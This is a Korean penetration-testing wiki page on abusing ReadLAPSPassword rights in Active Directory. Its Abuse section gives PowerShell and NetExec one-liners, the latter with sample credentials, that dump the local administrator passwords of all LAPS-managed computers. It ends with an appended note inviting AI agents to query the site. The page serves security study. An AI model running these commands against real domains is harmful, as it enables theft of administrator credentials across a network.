# ReadLAPSPassword

LAPS(Local Administrator Password Solution)은 액티브 디렉토리에 조인된 로컬 컴퓨터들의 관리자 패스워드를 관리하는 보안 솔루션입니다.

솔루션을 도입하면 LAPS가 현재 할당한 객체의 패스워드가 저장되는 속성인  `ms-Mcs-AdmPwd` 와 어떤 주기로 패스워드를 자동으로 변경할 것인지 저장하는 `ms-Mcs-AdmPwdExpirationTime` 이 있습니다.

공격자가 LAPS에서 관리하는 패스워드 속성을 읽을 수 있는 권한을 가진다면, 도메인 내의 LAPS로 관리되는 모든 로컬 컴퓨터 관리자 권한이 탈취될 수 있습니다.

## Abuse

{% tabs %}
{% tab title="Windows" %}

<pre class="language-powershell"><code class="lang-powershell"><strong># 모든 LAPS 관리 객체 패스워드 열거
</strong>Get-ADComputer -Filter * -Property 'ms-Mcs-AdmPwd'
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

<pre class="language-bash"><code class="lang-bash"><strong># 모든 LAPS 관리 객체 패스워드 열거
</strong>nxc ldap 192.168.1.35 -u Administrator -p 'Password123!' -M laps
</code></pre>

{% endtab %}
{% endtabs %}

## References

{% embed url="<https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-overview>" %}

{% embed url="<https://isgovern.com/blog/microsoft-laps-what-is-it-and-why-you-should-be-using-it/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentestwiki.com/active-directory/dacl/readlapspassword.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.